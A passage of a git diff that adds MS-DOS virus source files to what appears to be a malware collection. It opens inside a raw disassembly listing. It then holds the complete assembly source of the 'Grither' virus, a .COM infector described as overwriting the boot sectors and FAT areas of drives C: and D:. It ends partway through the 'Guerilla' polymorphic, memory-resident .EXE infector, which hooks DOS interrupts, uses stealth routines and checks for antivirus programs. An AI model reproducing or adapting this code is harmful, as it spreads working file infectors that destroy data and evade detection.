AX,DX +0A39 EE OUT DX,AL +0A3A EC IN AL,DX +0A3B EF OUT DX,AX +0A3C 5D POP BP +0A3D 47 INC DI +0A3E 48 DEC AX +0A3F 48 DEC AX +0A40 48 DEC AX +0A41 78 E7 JS 0A2A +0A43 E4 E6 IN AL,0E6 +0A45 E5 B1 IN AX,0B1 +0A47 A9 B9 A8 TEST AX,0A8B9 +0A4A B9 B0 84 MOV CX,084B0 +0A4D 77 7A JA 0AC9 +0A4F AD LODSW +0A50 34 4E XOR AL,04E +0A52 BE C5 C6 MOV SI,0C6C5 +0A55 34 4E XOR AL,04E +0A57 B8 C0 DB MOV AX,0DBC0 +0A5A 03 B4 84 6C ADD SI,W[SI+06C84] +0A5E 7A A7 JPE 0A07 +0A60 E5 3D IN AX,03D +0A62 81 8C B4 3D A1 8D OR W[SI+03DB4],08DA1 +0A68 B4 03 MOV AH,3 +0A6A B5 84 MOV CH,084 +0A6C 6C INSB +0A6D 7A A7 JPE 0A16 +0A6F 03 BD 07 97 ADD DI,W[DI+09707] +0A73 84 6C 0E TEST B[SI+0E],CH +0A76 B6 B7 MOV DH,0B7 +0A78 7A A7 JPE 0A21 +0A7A 37 AAA +0A7B 49 DEC CX +0A7C AF SCASW +0A7D CB RETF +0A7E B2 71 MOV DL,071 +0A80 B1 03 MOV CL,3 +0A82 B6 79 MOV DH,079 +0A84 37 AAA +0A85 49 DEC CX +0A86 B7 C0 MOV BH,0C0 +0A88 B2 71 MOV DL,071 +0A8A B1 03 MOV CL,3 +0A8C B6 71 MOV DH,071 +0A8E 37 AAA +0A8F 4D DEC BP +0A90 F8 CLC +0A91 CB RETF +0A92 B2 71 MOV DL,071 +0A94 B1 01 MOV CL,1 +0A96 B6 7D MOV DH,07D +0A98 37 AAA +0A99 4D DEC BP +0A9A B7 C0 MOV BH,0C0 +0A9C B2 71 MOV DL,071 +0A9E B1 01 MOV CL,1 +0AA0 B6 75 MOV DH,075 +0AA2 49 DEC CX +0AA3 71 49 JNO 0AEE +0AA5 7D 3F JGE 0AE6 +0AA7 A1 8D B4 MOV AX,W[0B48D] +0AAA 3F AAS +0AAB 81 8C B4 03 B5 84 OR W[SI+03B4],084B5 +0AB1 6C INSB +0AB2 7A A7 JPE 0A5B +0AB4 03 BD 07 9D ADD DI,W[DI+09D07] +0AB8 84 6C 0E TEST B[SI+0E],CH +0ABB B6 B7 MOV DH,0B7 +0ABD 7A A7 JPE 0A66 +0ABF 03 B5 84 6C ADD SI,W[DI+06C84] +0AC3 ED IN AX,DX +0AC4 7A A7 JPE 0A6D +0AC6 A8 B0 TEST AL,0B0 +0AC8 ED IN AX,DX +0AC9 EE OUT DX,AL +0ACA EC IN AL,DX +0ACB EF OUT DX,AX +0ACC 5D POP BP +0ACD 12 49 B7 ADC CL,B[BX+DI-049] +0AD0 47 INC DI +0AD1 8A B7 FC C3 MOV DH,B[BX+0C3FC] +0AD5 B9 8A F5 MOV CX,0F58A +0AD8 F6 C2 B3 TEST DL,0B3 +0ADB 0F 86 DB 0F,086 +0ADD 94 XCHG AX,SP +0ADE 78 5D JS 0B3D +0AE0 29 A7 A1 B6 SUB W[BX+0B6A1],SP +0AE4 2B E7 SUB SP,DI +0AE6 E4 E6 IN AL,0E6 +0AE8 E5 E1 IN AX,0E1 +0AEA E0 A9 LOOPNE 0A95 +0AEC B1 0F MOV CL,0F +0AEE B7 F4 MOV BH,0F4 +0AF0 7A 96 JPE 0A88 +0AF2 A9 E5 E6 TEST AX,0E6E5 +0AF5 84 7E 0F TEST B[BP+0F],BH +0AF8 B6 F4 MOV DH,0F4 +0AFA 7A 96 JPE 0A92 +0AFC 0F B5 DB 0F,0B5 +0AFE 8A 7A 96 MOV BH,B[BP+SI-06A] +0B01 24 0F AND AL,0F +0B03 B7 E0 MOV BH,0E0 +0B05 7A 96 JPE 0A9D +0B07 E6 E5 OUT 0E5,AL +0B09 B9 A8 B9 MOV CX,0B9A8 +0B0C B0 03 MOV AL,3 +0B0E 88 0E AD B7 MOV B[0B7AD],CL +0B12 0D 0B BF OR AX,0BF0B +0B15 7A 96 JPE 0AAD +0B17 0F B5 DB 0F,0B5 +0B19 F5 CMC +0B1A 84 7E 84 TEST B[BP-07C],BH +0B1D 65 7A 96 REPC JPE 0AB6 +0B20 36 89 0B SS MOV W[BP+DI],CX +0B23 BF FA ED MOV DI,0EDFA +0B26 C3 RET +0B27 BC 36 89 MOV SP,08936 +0B2A 08 BF F5 F6 OR B[BX+0F6F5],BH +0B2E C3 RET +0B2F EC IN AL,DX +0B30 5C POP SP +0B31 A0 27 36 MOV AL,B[03627] +0B34 89 7B BF MOV W[BP+DI-041],DI +0B37 F5 CMC +0B38 F6 C3 E7 TEST BL,0E7 +0B3B 5C POP SP +0B3C 9D POPF +0B3D 27 DAA +0B3E B0 A8 MOV AL,0A8 +0B40 E8 E9 ED CALL 0F92C +0B43 EE OUT DX,AL +0B44 EC IN AL,DX +0B45 EF OUT DX,AX +0B46 2A 5C 21 SUB BL,B[SI+021] +0B49 9A B4 B7 09 0B CALL 0B09:0B7B4 +0B4E BF 08 82 MOV DI,08208 +0B51 B4 13 MOV AH,013 +0B53 12 12 ADC DL,B[BP+SI] +0B55 71 F3 JNO 0B4A +0B57 4C DEC SP +0B58 5E POP SI +0B59 3E F3 4B DS REP DEC BX +0B5C 70 F3 JO 0B51 +0B5E 49 DEC CX +0B5F F5 CMC +0B60 F6 0E DB 0F6,0E +0B62 B2 B7 MOV DL,0B7 +0B64 5C POP SP +0B65 DE 27 FISUB W[BX] +0B67 E4 E5 IN AL,0E5 +0B69 E7 73 OUT 073,AX +0B6B B1 67 MOV CL,067 +0B6D BF 14 40 MOV DI,04014 +0B70 B7 3B MOV BH,03B +0B72 B1 4E MOV CL,04E +0B74 B7 73 MOV BH,073 +0B76 B1 7D MOV CL,07D +0B78 BF 3B B1 MOV DI,0B13B +0B7B 4C DEC SP +0B7C B7 14 MOV BH,014 +0B7E 4A DEC DX +0B7F B7 16 MOV BH,016 +0B81 73 BF JAE 0B42 +0B83 06 PUSH ES +0B84 B3 64 MOV BL,064 +0B86 57 PUSH DI +0B87 24 5C AND AL,05C +0B89 B3 27 MOV BL,027 +0B8B 5E POP SI +0B8C 37 AAA +0B8D B7 EF MOV BH,0EF +0B8F ED IN AX,DX +0B90 E7 E5 OUT 0E5,AX +0B92 9C PUSHF +0B93 74 34 JE 0BC9 +0B95 6D INSW +0B96 B7 0E MOV BH,0E +0B98 A7 CMPSW +0B99 B7 40 MOV BH,040 +0B9B 46 INC SI +0B9C 3E A1 67 BF DS MOV AX,W[0BF67] +0BA0 14 65 ADC AL,065 +0BA2 BF 14 7D MOV DI,07D14 +0BA5 BF 70 B1 MOV DI,0B170 +0BA8 7B BF JPO 0B69 +0BAA F5 CMC +0BAB F6 ED IMUL CH +0BAD EF OUT DX,AX +0BAE B2 E9 MOV DL,0E9 +0BB0 B3 34 MOV BL,034 +0BB2 65 B7 06 REPC MOV BH,6 +0BB5 BE E7 64 MOV SI,064E7 +0BB8 5F POP DI +0BB9 64 7D 4E REPNC JGE 0C0A +0BBC A4 MOVSB +0BBD 67 DB 067 +0BBE EF OUT DX,AX +0BBF 37 AAA +0BC0 53 PUSH BX +0BC1 B6 3E MOV DH,03E +0BC3 A1 77 BF MOV AX,W[0BF77] +0BC6 14 09 ADC AL,9 +0BC8 BF B9 B0 MOV DI,0B0B9 +0BCB 0E PUSH CS +0BCC AD LODSW +0BCD B7 EC MOV BH,0EC +0BCF E6 85 OUT 085,AL +0BD1 53 PUSH BX +0BD2 7A AD JPE 0B81 +0BD4 53 PUSH BX +0BD5 F7 85 76 85 75 8B TEST W[DI+08576],08B75 +0BDB B7 C3 MOV BH,0C3 +0BDD 45 INC BP +0BDE 15 EA B3 ADC AX,0B3EA +0BE1 84 41 08 TEST B[BX+DI+8],AL +0BE4 E9 B3 0E JMP 01A9A +0BE7 E9 B3 44 JMP 0509D +0BEA 13 E2 ADC SP,DX +0BEC 0A E9 OR CH,CL +0BEE B3 5F MOV BL,05F +0BF0 F0 B6 EA LOCK MOV DH,0EA +0BF3 03 F7 ADD SI,DI +0BF5 0D E9 B3 OR AX,0B3E9 +0BF8 0E PUSH CS +0BF9 E9 B3 7A JMP 086AF +0BFC 96 XCHG AX,SI +0BFD 0F B7 DB 0F,0B7 +0BFF F5 CMC +0C00 84 7E 84 TEST B[BP-07C],BH +0C03 65 7A 96 REPC JPE 0B9C +0C06 03 F7 ADD SI,DI +0C08 0D 0B BF OR AX,0BF0B +0C0B EE OUT DX,AL +0C0C 7A 96 JPE 0BA4 +0C0E 0F B6 DB 0F,0B6 +0C10 E0 ED LOOPNE 0BFF +0C12 EE OUT DX,AL +0C13 7A 96 JPE 0BAB +0C15 03 89 7A 96 ADD CX,W[BX+DI+0967A] +0C19 EE OUT DX,AL +0C1A ED IN AX,DX +0C1B A8 0F TEST AL,0F +0C1D B6 F4 MOV DH,0F4 +0C1F 7A 96 JPE 0BB7 +0C21 5E POP SI +0C22 AD LODSW +0C23 48 DEC AX +0C24 B9 A8 03 MOV CX,03A8 +0C27 BE 0D FC MOV SI,0FC0D +0C2A A6 CMPSB +0C2B F6 D3 NOT BL +0C2D DA DE DB 0DA,0DE +0C2F C5 D6 LDS DX,SI +0C31 DB 97 F5 D6 FIST D[BX+0D6F5] +0C35 DE DB DB 0DE,0DB +0C37 D2 CE ROR DH,CL +0C39 97 XCHG AX,DI +0C3A EC IN AL,DX +0C3B EE OUT DX,AL +0C3C F6 FA IDIV DL +0C3E EA B7 BA BD 97 JMP 097BD:0BAB7 +0C43 9D POPF +0C44 9D POPF +0C45 9D POPF +0C46 EC IN AL,DX +0C47 97 XCHG AX,DI +0C48 FD STD +0C49 C2 C4 C3 RET 0C3C4 +0C4C 97 XCHG AX,DI +0C4D C0 D6 D9 RCL DH,-027 +0C50 D9 D6 DB 0D9,0D6 +0C52 97 XCHG AX,DI +0C53 C4 D6 LES DX,SI +0C55 CE INTO +0C56 97 XCHG AX,DI +0C57 E0 D6 LOOPNE 0C2F +0C59 90 NOP +0C5A E4 C2 IN AL,0C2 +0C5C C7 97 C3 D8 8D 97 MOV W[BX+0D8C3],0978D +0C62 EA 9D 9D 9D 9D JMP 09D9D:09D9D +0C67 9D POPF +0C68 9D POPF +0C69 9D POPF +0C6A 9D POPF +0C6B 9D POPF +0C6C 9D POPF +0C6D 9D POPF +0C6E 9D POPF +0C6F 9D POPF +0C70 9D POPF +0C71 9D POPF +0C72 9D POPF +0C73 9D POPF +0C74 9D POPF +0C75 9D POPF +0C76 9D POPF +0C77 9D POPF +0C78 9D POPF +0C79 9D POPF +0C7A 9D POPF +0C7B 9D POPF +0C7C 9D POPF +0C7D 9D POPF +0C7E 9D POPF +0C7F 9D POPF +0C80 9D POPF +0C81 9D POPF +0C82 9D POPF +0C83 9D POPF +0C84 9D POPF +0C85 9D POPF +0C86 9D POPF +0C87 9D POPF +0C88 9D POPF +0C89 9D POPF +0C8A 9D POPF +0C8B 9D POPF +0C8C 9D POPF +0C8D 9D POPF +0C8E 9D POPF +0C8F 9D POPF +0C90 9D POPF +0C91 BD BA 97 MOV BP,097BA +0C94 97 XCHG AX,DI +0C95 97 XCHG AX,DI +0C96 97 XCHG AX,DI +0C97 97 XCHG AX,DI +0C98 97 XCHG AX,DI +0C99 97 XCHG AX,DI +0C9A 97 XCHG AX,DI +0C9B 97 XCHG AX,DI +0C9C 97 XCHG AX,DI +0C9D 97 XCHG AX,DI +0C9E 97 XCHG AX,DI +0C9F 97 XCHG AX,DI +0CA0 97 XCHG AX,DI +0CA1 E3 DF JCXZ 0C82 +0CA3 D2 97 F4 D6 RCL B[BX+0D6F4],CL +0CA7 C5 DA LDS BX,DX +0CA9 D2 DB RCR BL,CL +0CAB 97 XCHG AX,DI +0CAC FA CLI +0CAD D6 DB 0D6 +0CAE C4 C4 LES AX,SP +0CB0 DE C1 FADD +0CB2 D2 BD BA 97 SAR B[DI+097BA],CL +0CB6 97 XCHG AX,DI +0CB7 97 XCHG AX,DI +0CB8 97 XCHG AX,DI +0CB9 97 XCHG AX,DI +0CBA 97 XCHG AX,DI +0CBB 97 XCHG AX,DI +0CBC 97 XCHG AX,DI +0CBD 97 XCHG AX,DI +0CBE 97 XCHG AX,DI +0CBF 97 XCHG AX,DI +0CC0 97 XCHG AX,DI +0CC1 97 XCHG AX,DI +0CC2 97 XCHG AX,DI +0CC3 E3 DF JCXZ 0CA4 +0CC5 D2 97 FD D6 RCL B[BX+0D6FD],CL +0CC9 DA D6 DB 0DA,0D6 +0CCB DE D4 DB 0DE,0D4 +0CCD D6 DB 0D6 +0CCE D9 97 E7 D8 FST D[BX+0D8E7] +0CD2 C4 C4 LES AX,SP +0CD4 D2 97 D6 D9 RCL B[BX+0D9D6],CL +0CD8 D3 BD BA 97 SAR W[DI+097BA],CL +0CDC 97 XCHG AX,DI +0CDD 97 XCHG AX,DI +0CDE 97 XCHG AX,DI +0CDF 97 XCHG AX,DI +0CE0 97 XCHG AX,DI +0CE1 97 XCHG AX,DI +0CE2 97 XCHG AX,DI +0CE3 97 XCHG AX,DI +0CE4 97 XCHG AX,DI +0CE5 97 XCHG AX,DI +0CE6 97 XCHG AX,DI +0CE7 97 XCHG AX,DI +0CE8 97 XCHG AX,DI +0CE9 FA CLI +0CEA D6 DB 0D6 +0CEB D3 97 F4 D8 RCL W[BX+0D8F4],CL +0CEF D5 C5 AAD 0C5 +0CF1 D6 DB 0D6 +0CF2 99 CWD +0CF3 97 XCHG AX,DI +0CF4 FC CLD +0CF5 D2 D2 RCL DL,CL +0CF7 C7 97 C3 DF D2 97 MOV W[BX+0DFC3],097D2 +0CFD F1 DB 0F1 +0CFE FB STI +0CFF F2 EF REPNE OUT DX,AX +0D01 97 XCHG AX,DI +0D02 D6 DB 0D6 +0D03 DB DE DB 0DB,0DE +0D05 C1 D2 96 RCL DX,-06A +0D08 BD BA BA MOV BP,0BABA +0D0B BD F5 CE MOV BP,0CEF5 +0D0E 9A E3 DF D2 9A CALL 09AD2:0DFE3 +0D13 E0 D6 LOOPNE 0CEB +0D15 CE INTO +0D16 97 XCHG AX,DI +0D17 FD STD +0D18 D8 DF FCOMP 7 +0D1A D9 97 D4 D6 FST D[BX+0D6D4] +0D1E DB DB DB 0DB,0DB +0D20 97 XCHG AX,DI +0D21 C3 RET +0D22 DF DE DB 0DF,0DE +0D24 C4 97 D8 D9 LES DX,[BX+0D9D8] +0D28 D2 97 95 F0 RCL B[BX+0F095],CL +0D2C C5 D2 LDS DX,DX +0D2E D2 C3 ROL BL,CL +0D30 DE D9 FCOMPP +0D32 D0 C4 ROL AH,1 +0D34 95 XCHG AX,BP +0D35 99 CWD +0D36 BD BA 93 MOV BP,093BA +0D39 2E 8A A6 5D 04 CS MOV AH,B[BP+045D] +0D3E 8D B6 0B 00 LEA SI,[BP+0B] +0D42 B9 3F 04 MOV CX,043F +0D45 2E 30 24 CS XOR B[SI],AH +0D48 46 INC SI +0D49 E2 FA LOOP 0D45 +0D4B C3 RET +0D4C B7 90 MOV BH,090 diff --git a/MSDOS/Virus.MSDOS.Unknown.grither.asm b/MSDOS/Virus.MSDOS.Unknown.grither.asm new file mode 100644 index 00000000..d25e55e4 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.grither.asm @@ -0,0 +1,330 @@ + +;************************************************************************** +;** GRITHER VIRUS ** +;** Created: 27 Oct 1990 ** +;** [NukE] Notes: Does come from the Vienna Virus! And copies itself on ** +;** *.COMs and will re-write the begining sectors of drive ** +;** C: & D:! Erasing the FATs area... ** +;** ** +;** Sources Brought to you by -> Rock Steady [NukE]s Head Programmer! ** +;** ** +;************************************************************************** + +data_1e equ 2Ch ; (65AC:002C=0) +data_2e equ 75h ; (65AC:0075=0) +data_3e equ 79h ; (65AC:0079=0) + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +grither proc far + +start: +;* jmp short loc_1 ;*(0112) + db 0EBh, 10h + db 90h +data_5 db 'Q', 9, 3, '' ; Data table (indexed access) + db 0Ah, 0 + db 0BFh, 0, 1, 0B9h, 3, 0 + db 0F3h, 0A4h, 8Bh, 0F2h, 0B4h, 30h + db 0CDh, 21h, 3Ch, 0, 75h, 3 + db 0E9h, 0C5h, 1 +loc_2: + push es + mov ah,2Fh ; '/' + int 21h ; DOS Services ah=function 2Fh + ; get DTA ptr into es:bx + mov [si+0],bx + nop ;*Fixup for MASM (M) + mov [si+2],es + nop ;*Fixup for MASM (M) + pop es + mov dx,5Fh + nop + add dx,si + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + push es + push si + mov es,ds:data_1e ; (65AC:002C=0) + mov di,0 +loc_3: + pop si + push si + add si,1Ah + nop ;*Fixup for MASM (M) + lodsb ; String [si] to al + mov cx,8000h + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + mov cx,4 + +locloop_4: + lodsb ; String [si] to al + scasb ; Scan es:[di] for al + jnz loc_3 ; Jump if not zero + loop locloop_4 ; Loop if cx > 0 + + pop si + pop es + mov [si+16h],di + nop ;*Fixup for MASM (M) + mov di,si + nop + add di,1Fh + nop ;*Fixup for MASM (M) + mov bx,si + add si,1Fh + nop ;*Fixup for MASM (M) + mov di,si + jmp short loc_10 ; (01B9) +loc_5: + cmp word ptr [si+16h],0 + nop ;*Fixup for MASM (M) + jne loc_6 ; Jump if not equal + jmp loc_19 ; (02E9) +loc_6: + push ds + push si + mov ds,es:data_1e ; (65AC:002C=0) + mov di,si + mov si,es:[di+16h] + nop ;*Fixup for MASM (M) + add di,1Fh + nop ;*Fixup for MASM (M) +loc_7: + lodsb ; String [si] to al + cmp al,3Bh ; ';' + je loc_9 ; Jump if equal + cmp al,0 + je loc_8 ; Jump if equal + stosb ; Store al to es:[di] + jmp short loc_7 ; (019B) +loc_8: + mov si,0 +loc_9: + pop bx + pop ds + mov [bx+16h],si + nop ;*Fixup for MASM (M) + nop + cmp ch,5Ch ; '\' + je loc_10 ; Jump if equal + mov al,5Ch ; '\' + stosb ; Store al to es:[di] +loc_10: + mov [bx+18h],di + nop ;*Fixup for MASM (M) + mov si,bx + add si,10h + nop ;*Fixup for MASM (M) + mov cx,6 + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov si,bx + mov ah,4Eh ; 'N' + mov dx,1Fh + nop + add dx,si + mov cx,3 + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jmp short loc_12 ; (01DD) +loc_11: + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match +loc_12: + jnc loc_13 ; Jump if carry=0 + jmp short loc_5 ; (017F) +loc_13: + mov ax,ds:data_2e[si] ; (65AC:0075=0) + and al,1Fh + cmp al,1Fh + je loc_11 ; Jump if equal + cmp word ptr ds:data_3e[si],0FA00h ; (65AC:0079=0) + ja loc_11 ; Jump if above + cmp word ptr ds:data_3e[si],0Ah ; (65AC:0079=0) + jb loc_11 ; Jump if below + mov di,[si+18h] + nop ;*Fixup for MASM (M) + push si + add si,7Dh + nop ;*Fixup for MASM (M) +loc_14: + lodsb ; String [si] to al + stosb ; Store al to es:[di] + cmp al,0 + jne loc_14 ; Jump if not equal + pop si + mov ax,4300h + mov dx,1Fh + nop + add dx,si + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx + mov [si+8],cx + nop ;*Fixup for MASM (M) + mov ax,4301h + and cx,0FFFEh + mov dx,1Fh + nop + add dx,si + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx + mov ax,3D02h + mov dx,1Fh + nop + add dx,si + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_15 ; Jump if carry=0 + jmp loc_18 ; (02DA) +loc_15: + mov bx,ax + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov [si+4],cx + nop ;*Fixup for MASM (M) + mov [si+6],dx + nop ;*Fixup for MASM (M) + mov ah,2Ch ; ',' + int 21h ; DOS Services ah=function 2Ch + ; get time, cx=hrs/min, dh=sec + and dh,7 + jnz loc_16 ; Jump if not zero + mov ah,40h ; '@' + mov cx,85h + mov dx,si + add dx,8Ah + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + jmp short loc_17 ; (02C3) + db 90h +loc_16: + mov ah,3Fh ; '?' + mov cx,3 + mov dx,0Ah + nop + add dx,si + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + jc loc_17 ; Jump if carry Set + cmp ax,3 + jne loc_17 ; Jump if not equal + mov ax,4202h + mov cx,0 + mov dx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + jc loc_17 ; Jump if carry Set + mov cx,ax + sub ax,3 + mov [si+0Eh],ax + nop ;*Fixup for MASM (M) + add cx,2F7h + mov di,si + sub di,1F5h + mov [di],cx + mov ah,40h ; '@' + mov cx,306h + mov dx,si + sub dx,1F7h + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + jc loc_17 ; Jump if carry Set + cmp ax,306h + jne loc_17 ; Jump if not equal + mov ax,4200h + mov cx,0 + mov dx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + jc loc_17 ; Jump if carry Set + mov ah,40h ; '@' + mov cx,3 + mov dx,si + add dx,0Dh + nop ;*Fixup for MASM (M) + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx +loc_17: + mov dx,[si+6] + nop ;*Fixup for MASM (M) + mov cx,[si+4] + nop ;*Fixup for MASM (M) + and cx,0FFE0h + or cx,1Fh + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle +loc_18: + mov ax,4301h + mov cx,[si+8] + nop ;*Fixup for MASM (M) + mov dx,1Fh + nop + add dx,si + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx +loc_19: + push ds + mov ah,1Ah + mov dx,[si+0] + nop ;*Fixup for MASM (M) + mov ds,[si+2] + nop ;*Fixup for MASM (M) + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + pop ds +loc_20: + pop cx + xor ax,ax ; Zero register + xor bx,bx ; Zero register + xor dx,dx ; Zero register + xor si,si ; Zero register + mov di,100h + push di + xor di,di ; Zero register + retn 0FFFFh + db 10 dup (0) + db 0CDh, 20h, 90h, 0E9h, 0, 0 + db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0 + db 0, 0, 0, 0, 50h, 41h + db 54h, 48h, 3Dh, 0, 0 + db 105 dup (0) + db 0EBh, 58h, 90h + db ' `7O `88@99@6r `65@85M%AACC%YMJ%' + db 'LWNYMJW%AACC% `:@86@95r `68@87MH' + db 'tzwyjx~%tk%Jqj}nts `5r$' + db '3' + db 0C0h, 8Eh, 0D8h, 0B0h, 2, 0B9h + db 0A0h, 0, 33h, 0D2h, 0BBh, 0 + db 0, 0CDh, 26h, 0BBh, 0, 0 +loc_21: + cmp byte ptr data_5[bx],24h ; (65AC:0103=90h) '$' + je loc_22 ; Jump if equal + sub byte ptr data_5[bx],5 ; (65AC:0103=90h) + inc bx + jmp short loc_21 ; (0400) +loc_22: + mov dx,offset data_5 ; (65AC:0103=90h) + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + int 20h ; Program Terminate + +grither endp + +seg_a ends + + + + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.guerilla.asm b/MSDOS/Virus.MSDOS.Unknown.guerilla.asm new file mode 100644 index 00000000..31354a85 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.guerilla.asm @@ -0,0 +1,1207 @@ +; +; Guerilla 1996 +; Memory resident polymorphic DOS .EXE infector +; Brute Force Full Stealth (BFFS) +; Designed to spread fast and avoid detection-nondestructive & no payload +; Requires 386 or above and MS-DOS 5.0 or above +; +; Disclaimer: +; This file is only for educational purposes. The author takes absolutely +; no responsibility for anything that anyone does with this file. Do not +; modify this file. +; +; To compile use MASM: +; masm guerilla +; link guerilla +; (generates guerilla.exe) +; + +seg_a segment byte public + assume cs:seg_a , ds:seg_a , ss:seg_a + + +startvirus: + db 0bdh ; mov bp, XXh +delta dw 0 + + +movax305: mov al, 05h ; + mov ah, 03h ; + ; +subbxbx: and bx, 0 ; + nop ; + db 0cdh, 16h ; + + +movsibp: mov si, bp ; + clc ; + nop ; + call encrypt_decrypt ; + +; -------------------------------------------------------------------------- +; ENCRYPTION STARTS HERE +;--------------------------------------------------------------------------- + +outit: + push ds + + + clc ; + call encrypt_decrypt2 ; + + +testit: + + mov ah, 30h ; Dos-Version ? + int 21h ; + cmp al, 5 ; < 5.0? + jb done ; then no memory launch + + push cs + pop ds + lea dx, [bp+rep_input] ; + mov ah, 09h ; + int 21h ; + cmp bx, 3135h ; Already resident? + je done ; then no memory launch + + +vectorint: + sub ax, ax + mov ds, ax + + push ds:[21h*04h] ; Offset of INT 21h + push ds:[21h*04h] ; Offset of INT 21h + push ds:[21h*04h+02h] ; Segment of INT 21h + push ds:[21h*04h+02h] ; Segment of INT 21h + +storeints: + pop cs:[bp+int21seg] ; Segment of INT 21h + pop cs:[bp+int21s] ; Segment of INT 21h + pop cs:[bp+int21off] ; Offset of INT 21h + pop cs:[bp+int21o] ; Offset of INT 21h + + +findavmem: + xor di, di + call checkresav ; No memory launch if AV resident + je done ; + + mov ax, es + dec ax + push ax ; DS = segment of programs MCB + pop ds + + inc di + mov al, byte ptr ds:[di-1] + cmp al, 'N' + jl done + mov bx, word ptr ds:[di+02h] + sub bx, (endheap-startvirus+0fh)/16+1 + jc done ; no memory launch if not enuf mem + mov ax, word ptr ds:[di+11h] + sub ax, (endheap-startvirus+0fh)/16+1 + mov word ptr ds:[di+02h], bx + mov word ptr ds:[di+11h], ax + mov es, ax + + + sub ax, ax + mov ds, ax + + cli ; point to new interrupt location + mov word ptr ds:[21h*04h], offset (virusint21-startvirus) + mov word ptr ds:[21h*04h+02h], es + sti + + xor di, di + push cs + pop ds + cld + mov cx, endheap-startvirus ; + lea si, [bp+startvirus] ; + rep movsb ; Launch virus into memory + + done: + pop ds ; DS -> PSP + push ds ; + pop es ; ES -> PSP + + mov ax, es ; AX = PSP segment + add ax, 10h ; Adjust for PSP + + add word ptr cs:[bp+longjump+2], ax + db 81h, 0c0h ; add ax, XXXXh +origss dw 0 + + cli + db 0bch ; mov sp, XXXXh +origsp dw 0 + mov ss, ax + sti + + sub ax, ax + sub bx, bx + sub cx, cx + sub dx, dx + sub si, si + sub di, di + sub bp, bp + + db 0eah + ;oooo:ssss ; jmp ssss:oooo + longjump dd 0fff00000h ; Original CS:IP + +; -------------------------------------------------------------------------- +; int 21h handler +; -------------------------------------------------------------------------- +virusint21: + push si + pushf + xor si, si +loopme: cmp ah, byte ptr cs:[lookup+si] + jne more + popf + jmp word ptr cs:[lookup+si+1] + +more: add si, 3 + cmp si, 3*numberconditions + jne loopme + popf + pop si + jmp go_int + +lookup db 4bh + dw offset checkstealth + db 4ch + dw offset checkstealth + db 09h + dw offset repservice + db 11h + dw offset dirstealth + db 12h + dw offset dirstealth + db 4eh + dw offset findstealth + db 4fh + dw offset findstealth + db 3dh + dw offset cleanvirus + db 3eh + dw offset infectfile + db 6ch + dw offset cleanvirus + db 32h + dw offset checkstealth + +checkstealth: + push ax + push bx + push di + + mov di, offset (tbscan-1) + mov bx, di + + cmp ah, 32h + je turnoff + cmp ah, 4ch + je turnon + mov si, dx +periodlp: cmp byte ptr [si], '.' + je foundperiod + cmp byte ptr [si], 0 + je leaveit + inc si + jmp periodlp +foundperiod: +scanmore: + + dec si + inc di + mov al, byte ptr cs:[di] + cmp al, byte ptr [si] + je scanmore + cmp al, ' ' + je turnoff ; found one of the bad ones + add bx, 8 + mov di, bx + cmp byte ptr cs:[di+1], 0 + jne periodlp + + turnon: mov cs:[stealthon], 1 ; enable all stealth functions + jmp short leaveit + turnoff: mov cs:[stealthon], 0 ; disable all stealth functions + + leaveit: + pop di + pop bx + pop ax + pop si + jmp go_int + +tbscan db 'NACSBT ' ; programs that stealth is +win db 'NIW ' ; disabled for +tbsetup db 'PUTESBT ' ; +pkzip db 'PIZKP ' ; +arj db 'JRA ' ; +rar db 'RAR ' ; +lha db 'AHL ' ; +adinf db 'FNIDA ' ; + db 00h + +; ---------------------------------------------------------------------- +; INT 21 ah=3eh +; ---------------------------------------------------------------------- + +infectfile: + + push ax + push bx + push cx + push dx + push di + push es + push ds + pushf + push cs + pop ds + + cmp bl, 5 ; is file handle<5? + jb findquit ; then quit + + call checkdrive ; floppy? + jb findquit ; then quit + + cmp cs:[stealthon], 0 ; is stealth off? + jz findquit ; then quit + + call sft ; get sft + + + mov sftes, es ; store ES for later + mov sftdi, di ; store DI for later + + + cmp word ptr es:[di+28h],'XE' ; check .EXE file extension + jne findquit ; + cmp byte ptr es:[di+2Ah],'E' ; + jne findquit ; + + call checkmarker ; check marker #2 + jz findquit ; + + call movepointertotop ; move sft pointer to TOF + + lea dx, [header] ; read header + call readheader ; + jc findquit ; quit if cant read header + + cmp word ptr [si+18h], 40h ; windows file? + je findquit ; then quit + + mov ah, byte ptr [si+0h] ; check for 'M' in header + xor ah, 'M' ; + jne findquit ; + + mov ax, word ptr [si+12h] ; check marker #1 + ror ax, 1 ; + sub ax, 23 ; + cmp ax, word ptr [si+0Eh] ; SS + jz findquit ; quit if already infected + + + mov ax, 4202h ; get absolute file length + xor cx, cx ; + cwd ; + call simint21h ; get file length in DX:AX + + mov sizems, dx ; save size in dx for later + mov sizels, ax ; save size in ax for later + + or 